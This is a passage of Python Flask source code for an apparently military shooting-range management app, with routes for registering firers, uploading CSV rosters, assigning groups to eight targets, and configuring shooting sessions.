detail=Session_Detail.query.filter(Session_Detail.id == id)
for details in detail:
details.target_1=Shooter.query.filter(Shooter.id==details.target_1_id).scalar()
details.target_2=Shooter.query.filter(Shooter.id==details.target_2_id).scalar()
details.target_3=Shooter.query.filter(Shooter.id==details.target_3_id).scalar()
details.target_4=Shooter.query.filter(Shooter.id==details.target_4_id).scalar()
details.target_5=Shooter.query.filter(Shooter.id==details.target_5_id).scalar()
details.target_6=Shooter.query.filter(Shooter.id==details.target_6_id).scalar()
details.target_7=Shooter.query.filter(Shooter.id==details.target_7_id).scalar()
details.target_8=Shooter.query.filter(Shooter.id==details.target_8_id).scalar()
return render_template('pages/detail_view_id.html',data=detail)
@app.route('/detail_view/edit/<id>', methods=['GET', 'POST'])
def view_detail_edit(id):
try:
detail=Session_Detail.query.filter(Session_Detail.id == id).first()
form=DetailEditForm(obj=detail)
if form.validate_on_submit():
tmp_list = []
target_1=Shooter.query.filter(Shooter.service_id == form.target_1_service.data).scalar()
tmp_list.append(target_1.id)
target_2=Shooter.query.filter(Shooter.service_id == form.target_2_service.data).scalar()
tmp_list.append(target_2.id)
target_3=Shooter.query.filter(Shooter.service_id == form.target_3_service.data).scalar()
tmp_list.append(target_3.id)
target_4=Shooter.query.filter(Shooter.service_id == form.target_4_service.data).scalar()
tmp_list.append(target_4.id)
target_5=Shooter.query.filter(Shooter.service_id == form.target_5_service.data).scalar()
tmp_list.append(target_5.id)
target_6=Shooter.query.filter(Shooter.service_id == form.target_6_service.data).scalar()
tmp_list.append(target_6.id)
target_7=Shooter.query.filter(Shooter.service_id == form.target_7_service.data).scalar()
tmp_list.append(target_7.id)
target_8=Shooter.query.filter(Shooter.service_id == form.target_8_service.data).scalar()
tmp_list.append(target_8.id)
duplicate = False
for i in range(len(tmp_list)):
for j in range(len(tmp_list)):
if(tmp_list[i]== 999 and tmp_list[j]==999):
duplicate = False
elif(i!=j and tmp_list[i]==tmp_list[j]):
duplicate = True
if(duplicate):
return redirect(url_for('duplicate_firer_error'))
else:
detail.date=form.date.data
detail.session_id=form.session_id.data
detail.detail_no=form.detail_no.data
detail.paper_ref=form.paper_ref.data
detail.set_no=form.set_no.data
target_1_obj=Shooter.query.filter(Shooter.service_id == form.target_1_service.data).scalar()
detail.target_1_id=target_1_obj.id
target_2_obj=Shooter.query.filter(Shooter.service_id == form.target_2_service.data).scalar()
detail.target_2_id=target_2_obj.id
target_3_obj=Shooter.query.filter(Shooter.service_id == form.target_3_service.data).scalar()
detail.target_3_id=target_3_obj.id
target_4_obj=Shooter.query.filter(Shooter.service_id == form.target_4_service.data).scalar()
detail.target_4_id=target_4_obj.id
target_5_obj=Shooter.query.filter(Shooter.service_id == form.target_5_service.data).scalar()
detail.target_5_id=target_5_obj.id
target_6_obj=Shooter.query.filter(Shooter.service_id == form.target_6_service.data).scalar()
detail.target_6_id=target_6_obj.id
target_7_obj=Shooter.query.filter(Shooter.service_id == form.target_7_service.data).scalar()
detail.target_7_id=target_7_obj.id
target_8_obj=Shooter.query.filter(Shooter.service_id == form.target_8_service.data).scalar()
detail.target_8_id=target_8_obj.id
db.session.commit()
db.session.query(TPaper_ref).delete()
db.session.commit()
ref_edit = TPaper_ref(
paper_ref=form.paper_ref.data,
detail_no=form.detail_no.data,
session_no=form.session_id.data
)
db.session.add(ref_edit)
db.session.commit()
target_1_obj=Shooter.query.filter(Shooter.service_id == form.target_1_service.data).scalar()
target_2_obj=Shooter.query.filter(Shooter.service_id == form.target_2_service.data).scalar()
target_3_obj=Shooter.query.filter(Shooter.service_id == form.target_3_service.data).scalar()
target_4_obj=Shooter.query.filter(Shooter.service_id == form.target_4_service.data).scalar()
target_5_obj=Shooter.query.filter(Shooter.service_id == form.target_5_service.data).scalar()
target_6_obj=Shooter.query.filter(Shooter.service_id == form.target_6_service.data).scalar()
target_7_obj=Shooter.query.filter(Shooter.service_id == form.target_7_service.data).scalar()
target_8_obj=Shooter.query.filter(Shooter.service_id == form.target_8_service.data).scalar()
temp_shooting=db.session.query(TShooting).scalar()
if(temp_shooting.save_flag==1):
return redirect(url_for('data_save'))
else:
db.session.query(TShooting).filter(TShooting.id != 999).delete()
db.session.commit()
Tdetail_edit =TShooting(
date=form.date.data,
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=form.session_id.data,
detail_no=form.detail_no.data,
target_1_id=target_1_obj.id,
target_2_id=target_2_obj.id,
target_3_id=target_3_obj.id,
target_4_id=target_4_obj.id,
target_5_id=target_5_obj.id,
target_6_id=target_6_obj.id,
target_7_id=target_7_obj.id,
target_8_id=target_8_obj.id,
paper_ref=form.paper_ref.data,
set_no=form.set_no.data,
save_flag=0
)
db.session.add(Tdetail_edit)
db.session.commit()
return redirect(url_for('detail_view'))
form.date.data=detail.date
form.session_id.data=detail.session_id
form.detail_no.data=detail.detail_no
form.paper_ref.data=detail.paper_ref
form.set_no.data=detail.set_no
name_1= Shooter.query.filter(Shooter.id==detail.target_1_id).scalar()
form.target_1_service.data=data=name_1.service_id
name_2= Shooter.query.filter(Shooter.id==detail.target_2_id).scalar()
form.target_2_service.data=data=name_2.service_id
name_3= Shooter.query.filter(Shooter.id==detail.target_3_id).scalar()
form.target_3_service.data=data=name_3.service_id
name_4= Shooter.query.filter(Shooter.id==detail.target_4_id).scalar()
form.target_4_service.data=data=name_4.service_id
name_5=Shooter.query.filter(Shooter.id==detail.target_5_id).scalar()
form.target_5_service.data=data=name_5.service_id
name_6=Shooter.query.filter(Shooter.id==detail.target_6_id).scalar()
form.target_6_service.data=data=name_6.service_id
name_7=Shooter.query.filter(Shooter.id==detail.target_7_id).scalar()
form.target_7_service.data=data=name_7.service_id
name_8=Shooter.query.filter(Shooter.id==detail.target_8_id).scalar()
form.target_8_service.data=data=name_8.service_id
except Exception as e:
return render_template('errors/detail_view.html')
return render_template('pages/detail_view_edit.html' , detail=detail,form=form)
@app.route('/data_save', methods=['GET', 'POST'])
def data_save():
return render_template('pages/data_save.html')
@app.route('/target_registration/', methods=['GET', 'POST'])
def target_registration():
result=None
if request.method=="POST":
data1 = request.get_json()
print(data1)
cant=data1['cant']
div=data1['div']
rank=data1['rank']
gen=data1['gender']
dt=data1['date']
name=data1['name']
army_no=data1['service']
unit=data1['unit']
brigade=data1['brig']
gender_id=db.session.query(Gender.id).filter(Gender.name==gen).scalar()
rank_id=db.session.query(Rank.id).filter(Rank.name==rank).scalar()
cant_id=db.session.query(Cantonment.id).filter(Cantonment.cantonment==cant ,Cantonment.division==div).scalar()
print("cant_id")
print(cant_id)
shooter = Shooter(
name=name,
service_id = army_no,
registration_date = dt,
gender_id=gender_id,
cantonment_id = cant_id,
rank_id =rank_id,
unit=unit,
brigade=brigade
)
db.session.add(shooter)
db.session.commit()
result="Data Saved Sucessfully"
return jsonify(result=result)
@app.route('/shooter_registration/', methods=['GET', 'POST'])
def registration():
try:
cantonment=Cantonment.query.distinct(Cantonment.cantonment)
gender =Gender.query.all()
rank = Rank.query.all()
ran = request.form.get('comp_select4')
cant = request.form.get('comp_select')
gen = request.form.get('comp_select5')
brig = request.form.get('comp_select1')
form = RegistrationForm(request.form)
if(ran is None):
pass
else:
ran_object=Rank.query.filter(Rank.name==ran).scalar()
rank_id = ran_object.id
cant_object = Cantonment.query.filter(Cantonment.cantonment==cant,Cantonment.division==brig).scalar()
cant_id = cant_object.id
gen_obj=Gender.query.filter(Gender.name==gen).scalar()
gender_id = gen_obj.id
if form.validate_on_submit():
shooter = Shooter(
name=form.name.data,
service_id = form.service_id.data,
registration_date = form.dt.data.strftime('%Y-%m-%d'),
gender_id=gender_id,
cantonment_id = cant_id,
rank_id =rank_id,
unit=form.unit.data,
brigade=form.brig.data
)
db.session.add(shooter)
db.session.commit()
new_form = RegistrationForm(request.form)
return redirect(url_for('firer_details'))
except Exception as e:
return redirect(url_for('error_4'))
return render_template('forms/registration.html',
cantonment = cantonment ,
form=form ,
rank = rank,
gender=gender)
@app.route('/get_brigade/')
def get_brigade():
cant = request.args.get('customer')
da = da = Cantonment.query.filter(Cantonment.cantonment==cant).distinct(Cantonment.division)
data = [{"name": x.division} for x in da]
return jsonify(data)
@app.route('/firer_details/', methods=['GET', 'POST'])
def firer_details():
firer = Shooter.query.all()
for firers in firer:
firers.cantonment_name= Cantonment.query.filter(Cantonment.id==firers.cantonment_id).scalar()
firers.division = Cantonment.query.filter(Cantonment.id==firers.cantonment_id).scalar()
firers.rank = Rank.query.filter(Rank.id==firers.rank_id).scalar()
firers.gender_name = Gender.query.filter(Gender.id==firers.gender_id).scalar()
return render_template('pages/firer_details.html' , firer = firer)
@app.route('/bulk_registration_group')
def bulk_registration_group():
form=BulkRegistrationForm(request.form)
return render_template('pages/bulk_registration_group.html',form=form)
@app.route('/bulk_registration')
def bulk_registration():
cantonment=db.session.query(Cantonment).distinct(Cantonment.cantonment)
form=RegistrationForm(request.form)
return render_template('pages/bulk_registration.html',cantonment=cantonment,form=form)
@app.route('/upload', methods=['POST'])
def upload():
try:
f = request.files['data_file']
cant = request.form.get('comp_select')
div = request.form.get('comp_select1')
form=RegistrationForm(request.form)
unit = request.form['game_id_1']
brig = request.form['game_id_2']
cant_id = db.session.query(Cantonment.id).filter(Cantonment.cantonment==cant,
Cantonment.division==div
).scalar()
if form.is_submitted():
stream = StringIO(f.stream.read().decode("UTF8"))
csv_input = csv.reader(stream)
lis =list(csv_input)
for i in range(len(lis)):
if (i==0):
pass
else:
shooters = Shooter(
name = lis[i][0],
service_id=lis[i][3],
registration_date=datetime.now(),
gender_id=db.session.query(Gender.id).filter(Gender.name==lis[i][2]).scalar(),
cantonment_id = cant_id,
rank_id = db.session.query(Rank.id).filter(Rank.name==lis[i][1]).scalar(),
unit=unit,
brigade=brig
)
db.session.add(shooters)
db.session.commit()
except Exception as e:
return redirect(url_for('error_3'))
return redirect(url_for('firer_details'))
@app.route('/uploadgroup', methods=['POST'])
def uploadgroup():
try:
f = request.files['data_file']
form=BulkRegistrationForm(request.form)
if form.is_submitted():
curdate_p=(date.today())- timedelta(1)
if(db.session.query(db.exists().where(TGroup.date <= curdate_p)).scalar()):
db.session.query(TGroup).delete()
db.session.commit()
stream = StringIO(f.stream.read().decode("UTF8"))
csv_input = csv.reader(stream)
lis =list(csv_input)
for i in range(len(lis)):
if (i==0):
pass
else:
group = TGroup(
date=datetime.now(),
group_no=lis[i][0],
target_1_no=lis[i][1],
target_2_no=lis[i][2],
target_3_no=lis[i][3],
target_4_no=lis[i][4],
target_5_no=lis[i][5],
target_6_no=lis[i][6],
target_7_no=lis[i][7],
target_8_no=lis[i][8]
)
db.session.add(group)
db.session.commit()
else:
stream = StringIO(f.stream.read().decode("UTF8"))
csv_input = csv.reader(stream)
lis =list(csv_input)
for i in range(len(lis)):
if (i==0):
pass
else:
group = TGroup(
date=datetime.now(),
group_no=lis[i][0],
target_1_no=lis[i][1],
target_2_no=lis[i][2],
target_3_no=lis[i][3],
target_4_no=lis[i][4],
target_5_no=lis[i][5],
target_6_no=lis[i][6],
target_7_no=lis[i][7],
target_8_no=lis[i][8]
)
db.session.add(group)
db.session.commit()
except Exception as e:
return redirect(url_for('error_duplicate'))
return redirect(url_for('group_view'))
@app.route('/new_group')
def new_group():
firer = [row.service_id for row in Shooter.query.all()]
return render_template('pages/new_group.html',firer_1=firer)
@app.route('/individual_group/', methods=['GET', 'POST'])
def individual_group():
try:
curdate_p=(date.today())- timedelta(1)
#check=mysession.query(TGroup).filter(date==curdate_p).all()
if request.method=="POST":
grp = request.form['game_id_1']
tmp_list = []
duplicate = False
r=request.form['tag']
if (r== ""):
r_id = 999
else:
r_object=Shooter.query.filter(Shooter.service_id==r).scalar()
r_id=r_object.id
r1=request.form['tag_1']
if(r1== ""):
r1_id=999
else:
r1_object=Shooter.query.filter(Shooter.service_id==r1).scalar()
r1_id=r1_object.id
r2=request.form['tag_2']
if (r2==""):
r2_id=999
else:
r2_object=Shooter.query.filter(Shooter.service_id==r2).scalar()
r2_id=r2_object.id
r3=request.form['tag_3']
if(r3==""):
r3_id=999
else:
r3_object=Shooter.query.filter(Shooter.service_id==r3).scalar()
r3_id=r3_object.id
r4=request.form['tag_4']
if(r4==""):
r4_id=999
else:
r4_object=Shooter.query.filter(Shooter.service_id==r4).scalar()
r4_id=r4_object.id
r5=request.form['tag_5']
if(r5==""):
r5_id=999
else:
r5_object=Shooter.query.filter(Shooter.service_id==r5).scalar()
r5_id=r5_object.id
r6=request.form['tag_6']
if(r6==""):
r6_id=999
else:
r6_object=Shooter.query.filter(Shooter.service_id==r6).scalar()
r6_id=r6_object.id
r7=request.form['tag_7']
if(r7== ""):
r7_id=999
else:
r7_object=Shooter.query.filter(Shooter.service_id==r7).scalar()
r7_id=r7_object.id
tmp_list.append(r_id)
tmp_list.append(r1_id)
tmp_list.append(r2_id)
tmp_list.append(r3_id)
tmp_list.append(r4_id)
tmp_list.append(r5_id)
tmp_list.append(r6_id)
tmp_list.append(r7_id)
for i in range(len(tmp_list)):
for j in range(len(tmp_list)):
if(tmp_list[i]== 999 and tmp_list[j]==999):
duplicate = False
elif(i!=j and tmp_list[i]==tmp_list[j]):
duplicate = True
if(db.session.query(db.exists().where(TGroup.date == curdate_p)).scalar()):
db.session.query(TGroup).delete()
db.session.commit()
if(duplicate):
return redirect(url_for('duplicate_firer_error'))
else:
gr=TGroup(
date=datetime.now(),
group_no=grp,
target_1_no=r,
target_2_no=r1,
target_3_no=r2,
target_4_no=r3,
target_5_no=r4,
target_6_no=r5,
target_7_no=r6,
target_8_no=r7
)
db.session.add(gr)
db.session.commit()
else:
if(duplicate):
return redirect(url_for('duplicate_firer_error'))
else:
gr=TGroup(
date=datetime.now(),
group_no=grp,
target_1_no=r,
target_2_no=r1,
target_3_no=r2,
target_4_no=r3,
target_5_no=r4,
target_6_no=r5,
target_7_no=r6,
target_8_no=r7
)
db.session.add(gr)
db.session.commit()
except Exception as e:
return render_template('errors/group_view_error.html')
return redirect(url_for('group_view'))
@app.route('/group_view/', methods=['GET', 'POST'])
def group_view():
detail = TGroup.query.all()
return render_template('pages/group_detail_view.html',detail=detail)
@app.route('/group_view/detail/<id>', methods=['GET', 'POST'])
def group_detail_view(id):
view = TGroup.query.filter(TGroup.group_no == id)
return render_template('pages/group_detail_view_id.html' , data = view)
@app.route('/group_details/edit/<id>', methods=['GET', 'POST'])
def group_detail_edit(id):
firer = TGroup.query.filter(TGroup.group_no == id).first()
form=GroupEditForm(obj=firer)
if form.validate_on_submit():
firer.date=form.date.data
firer.target_1_no=form.target_1_army.data
firer.target_2_no=form.target_2_army.data
firer.target_3_no=form.target_3_army.data
firer.target_4_no=form.target_4_army.data
firer.target_5_no=form.target_5_army.data
firer.target_6_no=form.target_6_army.data
firer.target_7_no=form.target_7_army.data
firer.target_8_no=form.target_8_army.data
firer.group_no=form.group_no.data
db.session.commit()
return redirect(url_for('group_view'))
form.group_no.data=firer.group_no
form.target_1_army.data=firer.target_1_no
form.target_2_army.data=firer.target_2_no
form.target_3_army.data=firer.target_3_no
form.target_4_army.data=firer.target_4_no
form.target_5_army.data=firer.target_5_no
form.target_6_army.data=firer.target_6_no
form.target_7_army.data=firer.target_7_no
form.target_8_army.data=firer.target_8_no
return render_template('pages/group_edit.html' , firer = firer , form=form)
@app.route('/firer_details/detail/<id>', methods=['GET', 'POST'])
def firer_detail_view(id):
firer = Shooter.query.filter(Shooter.service_id == id)
for firers in firer:
firers.cantonment_name= Cantonment.query.filter(Cantonment.id==firers.cantonment_id).scalar()
firers.division = Cantonment.query.filter(Cantonment.id==firers.cantonment_id).scalar()
firers.rank = Rank.query.filter(Rank.id==firers.rank_id).scalar()
firers.gender_name = Gender.query.filter(Gender.id==firers.gender_id).scalar()
return render_template('pages/firer_detail_view.html' , data = firer)
@app.route('/firer_details/edit/<id>', methods=['GET', 'POST'])
def firer_detail_edit(id):
firer = Shooter.query.filter(Shooter.service_id == id).first()
form=RegistrationEditForm(obj=firer)
try:
if form.validate_on_submit():
firer.name = form.name.data
firer.service_id=form.service_id.data
firer.registration_date=form.date.data
gender_obj=Gender.query.filter(Gender.name==form.gender.data).scalar()
firer.gender_id=gender_obj.id
cantonment_obj=Cantonment.query.filter(Cantonment.cantonment==form.cantonment.data ,Cantonment.division==form.div.data).scalar()
firer.cantonment_id=cantonment_obj.id
rank_obj=Range.query.filter(Rank.name==form.rank.data).distinct(Rank.id).scalar()
firer.rank_id=rank_obj.id
firer.unit=form.unit.data
firer.brigade=form.brigade.data
db.session.commit()
return redirect(url_for('firer_details'))
form.name.data=firer.name
form.service_id.data=firer.service_id
form.date.data=firer.registration_date
gender_name=Gender.query.filter(Gender.id==firer.gender_id).scalar()
form.gender.data=gender_name.name
cantonment_name=Cantonment.query.filter(Cantonment.id==firer.cantonment_id).scalar()
form.cantonment.data=cantonment_name.cantonment
form.div.data=cantonment_name.division
unit_data=Shooter.query.filter(Shooter.service_id==firer.service_id).scalar()
form.unit.data=unit_data.unit
form.brigade.data=unit_data.brigade
rank_name=Rank.query.filter(Rank.id==firer.rank_id).distinct(Rank.name).scalar()
form.rank.data=rank_name.name
except Exception as e:
return redirect(url_for('error_7'))
return render_template('pages/firer_detail_edit.html' , firer = firer , form=form)
@app.route('/live/')
def live():
T1_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_1_id).scalar()
T1_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_1_id).scalar()
T1_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_1_id).scalar()
T1_rank = mysession.query(Rank.name).filter(Rank.id==T1_r_id).scalar()
T2_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_2_id).scalar()
T2_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_2_id).scalar()
T2_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_2_id).scalar()
T2_rank = mysession.query(Rank.name).filter(Rank.id==T2_r_id).scalar()
T3_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_3_id).scalar()
T3_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_3_id).scalar()
T3_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_3_id).scalar()
T3_rank = mysession.query(Rank.name).filter(Rank.id==T3_r_id).scalar()
T4_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_4_id).scalar()
T4_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_4_id).scalar()
T4_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_4_id).scalar()
T4_rank = mysession.query(Rank.name).filter(Rank.id==T4_r_id).scalar()
T5_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_5_id).scalar()
T5_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_5_id).scalar()
T5_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_5_id).scalar()
T5_rank = mysession.query(Rank.name).filter(Rank.id==T5_r_id).scalar()
T6_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_6_id).scalar()
T6_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_6_id).scalar()
T6_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_6_id).scalar()
T6_rank = mysession.query(Rank.name).filter(Rank.id==T6_r_id).scalar()
T7_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_7_id).scalar()
T7_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_7_id).scalar()
T7_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_7_id).scalar()
T7_rank = mysession.query(Rank.name).filter(Rank.id==T7_r_id).scalar()
T8_name = mysession.query(Shooter.name).filter(Shooter.id==TShooting.target_8_id).scalar()
T8_service = mysession.query(Shooter.service_id).filter(Shooter.id==TShooting.target_8_id).scalar()
T8_r_id = mysession.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_8_id).scalar()
T8_rank = mysession.query(Rank.name).filter(Rank.id==T8_r_id).scalar()
return render_template('pages/live.html' ,
T1_name=T1_name,
T1_service=T1_service,
T2_name=T2_name,
T2_service=T2_service,
T3_name=T3_name,
T3_service=T3_service,
T4_name=T4_name,
T4_service=T4_service,
T5_name=T5_name,
T5_service=T5_service,
T6_name=T6_name,
T6_service=T6_service,
T7_name=T7_name,
T7_service=T7_service,
T8_name=T8_name,
T8_service=T8_service,
T1_rank=T1_rank,
T2_rank=T2_rank,
T3_rank=T3_rank,
T4_rank=T4_rank,
T5_rank=T5_rank,
T6_rank=T6_rank,
T7_rank=T7_rank,
T8_rank=T8_rank
)
@app.route('/cam_detail_2/', methods=['GET', 'POST'])
def cam_detail_2():
return render_template('pages/cam_detail_1.html')
@app.route('/cam_detail_4/', methods=['GET', 'POST'])
def cam_detail_4():
return render_template('pages/cam_detail_2.html')
@app.route('/cam_detail_1/', methods=['GET', 'POST'])
def cam_detail_1():
return render_template('pages/cam_detail_3.html')
@app.route('/cam_detail_3/', methods=['GET', 'POST'])
def cam_detail_3():
return render_template('pages/cam_detail_4.html')
@app.route('/cam_detail_6/', methods=['GET', 'POST'])
def cam_detail_6():
return render_template('pages/cam_detail_5.html')
@app.route('/cam_detail_8/', methods=['GET', 'POST'])
def cam_detail_8():
return render_template('pages/cam_detail_6.html')
@app.route('/cam_detail_7/', methods=['GET', 'POST'])
def cam_detail_7():
return render_template('pages/cam_detail_7.html')
@app.route('/cam_detail_5/', methods=['GET', 'POST'])
def cam_detail_5():
return render_template('pages/cam_detail_8.html')
@app.route('/session_setup/', methods=['GET', 'POST'])
def session_setup():
try:
data = Shooter.query.all()
rang= Range.query.all()
firearms = Firearms.query.all()
ammunation = Ammunation.query.all()
rang_name = request.form.get('comp_select_4')
fire_name = request.form.get('comp_select_5')
ammu_name = request.form.get('comp_select_6')
form=SessionForm()
if(rang_name is None):
range_id=999
fire_id=999
ammu_id=999
else:
range_id = db.session.query(Range.id).filter(Range.name==rang_name).scalar()
fire_id = db.session.query(Firearms.id).filter(Firearms.name==fire_name).scalar()
ammu_id = db.session.query(Ammunation.id).filter(Ammunation.name==ammu_name).scalar()
if form.validate_on_submit():
shooting=Shooting_Session(
date=form.date.data.strftime('%Y-%m-%d'),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
shooting_range_id=range_id,
firearms_id=fire_id,
ammunation_id=ammu_id,
target_distance = form.target_distance.data,
weather_notes = form.weather_notes.data,
comments = form.comments.data,
session_no=form.session_no.data,
occasion=form.occ.data
)
db.session.add(shooting)
db.session.commit()
return redirect(url_for('session_config'))
except Exception as e:
return redirect(url_for('error5_505.html'))
return render_template('forms/shooting_form.html', form=form, data =data ,rang=rang , firearmns=firearms, ammunation = ammunation)
@app.route('/configuration/', methods=['GET', 'POST'])
def session_config():
config = Shooting_Session.query.all()
for con in config:
con.range_name = Range.query.filter(Range.id==con.shooting_range_id).scalar()
con.firerarms_name = Firearms.query.filter(Firearms.id==con.firearms_id).scalar()
con.ammunation_name = Ammunation.query.filter(Ammunation.id==con.ammunation_id).scalar()
return render_template('pages/shooting_configuration_detail.html',con=config)
@app.route('/image_process/')
def image_process():
dt=time.strftime("%Y-%m-%d")
detail_data=db.session.query(Session_Detail).filter(Session_Detail.date==dt,Session_Detail.save_flag==0).all()
data =TShooting.query.scalar()
if(data is None):
T1_name ="NA"
T1_service ="NA"
T1_rank="NA"
T2_name ="NA"
T2_service ="NA"
T2_rank="NA"
T3_name ="NA"
T3_service ="NA"
T3_rank="NA"
T4_name ="NA"
T4_service ="NA"
T4_rank="NA"
T5_name ="NA"
T5_service ="NA"
T5_rank="NA"
T6_name ="NA"
T6_service ="NA"
T6_rank="NA"
T7_name ="NA"
T7_service ="NA"
T7_rank="NA"
T8_name ="NA"
T8_service ="NA"
T8_rank="NA"
elif(data.save_flag == 1 ):
db.session.query(TShooting).delete()
db.session.commit()
T1_name ="NA"
T1_service ="NA"
T1_rank="NA"
T2_name ="NA"
T2_service ="NA"
T2_rank="NA"
T3_name ="NA"
T3_service ="NA"
T3_rank="NA"
T4_name ="NA"
T4_service ="NA"
T4_rank="NA"
T5_name ="NA"
T5_service ="NA"
T5_rank="NA"
T6_name ="NA"
T6_service ="NA"
T6_rank="NA"
T7_name ="NA"
T7_service ="NA"
T7_rank="NA"
T8_name ="NA"
T8_service ="NA"
T8_rank="NA"
else:
T1=Shooter.query.filter(Shooter.id==TShooting.target_1_id).scalar()
if(T1 is None):
T1_name ="NA"
T1_service ="NA"
T1_rank="NA"
else:
T1_name = T1.name
T1_service = T1.service_id
T1_r_id = T1.rank_id
T1_rank_id = Rank.query.filter(Rank.id==T1_r_id).scalar()
T1_rank=T1_rank_id.name
T2=Shooter.query.filter(Shooter.id==TShooting.target_2_id).scalar()
if(T2 is None):
T2_name ="NA"
T2_service ="NA"
T2_rank="NA"
else:
T2_name = T2.name
T2_service = T2.service_id
T2_r_id = T2.rank_id
T2_rank_id = Rank.query.filter(Rank.id==T2_r_id).scalar()
T2_rank=T2_rank_id.name
T3=Shooter.query.filter(Shooter.id==TShooting.target_3_id,TShooting.target_3_id!=999).scalar()
if(T3 is None):
T3_name ="NA"
T3_service ="NA"
T3_rank="NA"
else:
T3_name = T3.name
T3_service = T3.service_id
T3_r_id = T3.rank_id
T3_rank_id = Rank.query.filter(Rank.id==T3_r_id).scalar()
T3_rank=T3_rank_id.name
T4=Shooter.query.filter(Shooter.id==TShooting.target_4_id,TShooting.target_4_id!=999).scalar()
if(T4 is None):
T4_name ="NA"
T4_service ="NA"
T4_rank="NA"
else:
T4_name = T4.name
T4_service = T4.service_id
T4_r_id = T4.rank_id
T4_rank_id = Rank.query.filter(Rank.id==T4_r_id).scalar()
T4_rank=T4_rank_id.name
T5=Shooter.query.filter(Shooter.id==TShooting.target_5_id).scalar()
if(T5 is None):
T5_name ="NA"
T5_service ="NA"
T5_rank="NA"
else:
T5_name = T5.name
T5_service = T5.service_id
T5_r_id = T5.rank_id
T5_rank_id = Rank.query.filter(Rank.id==T5_r_id).scalar()
T5_rank=T5_rank_id.name
T6=Shooter.query.filter(Shooter.id==TShooting.target_6_id).scalar()
if(T6 is None):
T6_name ="NA"
T6_service ="NA"
T6_rank="NA"
else:
T6_name = T6.name
T6_service = T6.service_id
T6_r_id = T6.rank_id
T6_rank_id = Rank.query.filter(Rank.id==T6_r_id).scalar()
T6_rank=T6_rank_id.name
T7=Shooter.query.filter(Shooter.id==TShooting.target_7_id).scalar()
if(T7 is None):
T7_name ="NA"
T7_service ="NA"
T7_rank="NA"
else:
T7_name = T7.name
T7_service = T7.service_id
T7_r_id = T7.rank_id
T7_rank_id = Rank.query.filter(Rank.id==T7_r_id).scalar()
T7_rank=T7_rank_id.name
T8=Shooter.query.filter(Shooter.id==TShooting.target_8_id).scalar()
if(T8 is None):
T8_name ="NA"
T8_service ="NA"
T8_rank="NA"
else:
T8_name = T8.name
T8_service = T8.service_id
T8_r_id = T8.rank_id
T8_rank_id = Rank.query.filter(Rank.id==T8_r_id).scalar()
T8_rank=T8_rank_id.name
return render_template('pages/image_process.html' ,
T1_name=T1_name,
detail_data=detail_data,
T1_service=T1_service,
T2_name=T2_name,
T2_service=T2_service,
T3_name=T3_name,
T3_service=T3_service,
T4_name=T4_name,
T4_service=T4_service,
T5_name=T5_name,
T5_service=T5_service,
T6_name=T6_name,
T6_service=T6_service,
T7_name=T7_name,
T7_service=T7_service,
T8_name=T8_name,
T8_service=T8_service,
T1_rank=T1_rank,
T2_rank=T2_rank,
T3_rank=T3_rank,
T4_rank=T4_rank,
T5_rank=T5_rank,
T6_rank=T6_rank,
T7_rank=T7_rank,
T8_rank=T8_rank
)
@app.route('/image_edit_1/', methods=['GET', 'POST'])
def image_edit_1():
return render_template('pages/image_edit_1.html')
@app.route('/image_edit_2/', methods=['GET', 'POST'])
def image_edit_2():
return render_template('pages/image_edit_2.html')
@app.route('/image_edit_3/', methods=['GET', 'POST'])
def image_edit_3():
return render_template('pages/image_edit_3.html')
@app.route('/image_edit_4/', methods=['GET', 'POST'])
def image_edit_4():
return render_template('pages/image_edit_4.html')
@app.route('/image_edit_5/', methods=['GET', 'POST'])
def image_edit_5():
return render_template('pages/image_edit_5.html')
@app.route('/image_edit_6/', methods=['GET', 'POST'])
def image_edit_6():
return render_template('pages/image_edit_6.html')
@app.route('/image_edit_7/', methods=['GET', 'POST'])
def image_edit_7():
return render_template('pages/image_edit_7.html')
@app.route('/image_edit_8/', methods=['GET', 'POST'])
def image_edit_8():
return render_template('pages/image_edit_8.html')
@app.route('/configuration/detail/<id>', methods=['GET', 'POST'])
def session_config_detail(id):
config = Shooting_Session.query.filter(Shooting_Session.id == id)
for con in config:
con.range_name = Range.query.filter(Range.id==con.shooting_range_id).scalar()
con.firerarms_name = Firearms.query.filter(Firearms.id==con.firearms_id).scalar()
con.ammunation_name = Ammunation.query.filter(Ammunation.id==con.ammunation_id).scalar()
return render_template('pages/shooting_configuration_detail_view.html',con=config)
@app.route('/configuration/edit/<id>', methods=['GET', 'POST'])
def shooting_config_edit(id):
edit = Shooting_Session.query.get_or_404(id)
form = SessionEditForm(obj=edit)
if form.validate_on_submit():
edit.session_no = form.session_no.data
edit.date = form.date.data
edit.occasion=form.occ.data
edit.target_distance = form.target_distance.data
ammunation_id=Ammunation.query.filter(Ammunation.name==form.ammunation_name.data).scalar()
edit.ammunation_id=ammunation_id.id
firearms_id=Firearms.query.filter(Firearms.name==form.firerarms_name.data).scalar()
edit.firearms_id=firearms_id.id
range_id=Range.query.filter(Range.name==form.range_name.data).scalar()
edit.shooting_range_id=range_id.id
edit.weather_notes=form.weather_notes.data
edit.comments=form.comments.data
db.session.commit()
return redirect(url_for('session_config'))
